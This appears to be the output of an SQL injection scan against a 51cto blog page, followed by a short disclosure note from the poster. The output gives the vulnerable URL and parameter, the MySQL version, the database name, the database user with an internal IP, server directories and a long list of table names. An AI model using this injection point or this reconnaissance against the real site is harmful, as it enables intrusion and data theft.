Parameter Name Parameter Value
Scan URL https://blog.51cto.com/mod/userface.php?useruid=103622
2
Database Type Mysql
Injection Type Integer
Keyword True
Charset 0
Database Server Information
Information title Information Value
magic_quotes_gpc On
OS 1 Linux
OS 2 unknown-linux-gnu
VERSION 5.4.1-beta-log
DATABASE pblog
USER mysql@192.168.168.224
SYSTEM_USER mysql@192.168.168.224
SESSION_USER mysql@192.168.168.224
CURRENT_USER mysql@192.168.168.%
BASE DIR /usr/server/mysql54/
DATA DIR /usr/server/mysql54/var/
TEMP DIR /tmp/
group_concat_max_len 1024
Stacked No
Table List
Table Name Page
pw4_diyclass 7
pw_match_users 7
record_user_category 7
pw4_groupblock 7
pw_photo 7
sorcecount 7
act_twoyear 7
pw2_vote 7
pw_blog_adv 7
book_user 7
pw4_addgroup 7
pw_favour 7
guanggao_user 7
pw_tuser 7
pw_setting 7
java_edu3 7
pw_userlink 7
pw_stoneTogold_betting 7
pw2_flink 7
record_user_category_week 7
pw4_diyclassart 8
pw_bgmusic 8
pw4_grouplogin 8
pw_plusfile 8
pw_comment_bak 8
pw4_user_group 8
asus_active 8
weekview 8
collect_blog 8
pw4_adminaction 8
pw2_blogtag_bak 8
hope_activerecord 8
pw_uid_bid 8
pw_match_reported 8
pw_userskin 8
pw_stoneTogold_homeprize 8
pw_passport 8
sorce 8
pw2_visit 8
pw_blog 9
pw4_grouptag 9
pw3_photo 9
pw_domain 9
pw4_view 12
pw_search_word 12
java_edu 12
em_list_update 12
pw_special_tag 12
pw2_bmsg_bak 12
hope_prizerecord 12
pw5_bbsart 12
index2_jd 12
stopuser 12
pw_share 12
index_star 13
pw4_flink 13
blog_active_prizeman 13
pw_upload 13
index_imgs 13
pw_userblock 13
pw_bmsg 13
groupgooder 13
pw_style 13
pw_gbook 13
tempscore 13
pw5_style 13
live_user 13
record_user_category_user_day 13
pw4_mod_setting 13
pw2_relatedart 13
pw_group 13
index_jd 13
pw_match_vote 13
pw_class 14
groupindex_imgs 14
pw_pusher_blogs 14
threeyear_toupiao 14
pw3_album 14
niming_comment 14
record_user_category_user_month 14
pw4_bbsart 14
pw2_style 14
pw_huodongbm 14
pw_user 14
pw4_group_art 14
pw_messager 14
pw_class_update 14
pw_stoneTogold_stone 14
pw_recommen 14
pw5_bbsart_content 14
blog_star 14
pw3_album_comment 14
pw2_blog_bak 15
pw4_join 15
pw4_bbsart_content 15
pw2_update 15
index_gz 15
pw_user_weekbak 15
pw_special_adv 15
group_message 15
pw_stoneTogold_userinfo 15
pw_replace 15
tempart 15
pw5_group 15
bocai 15
record_user_category_month 15
pw4_lives 15
pw4_bbsarttj 15
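Out of respect for 51cto, and because my own skills are limited, I did not test any further.
The test results have been reported to the administrators; anyone who abuses this vulnerability bears the consequences themselves.
Follow 51cto, follow seclufei.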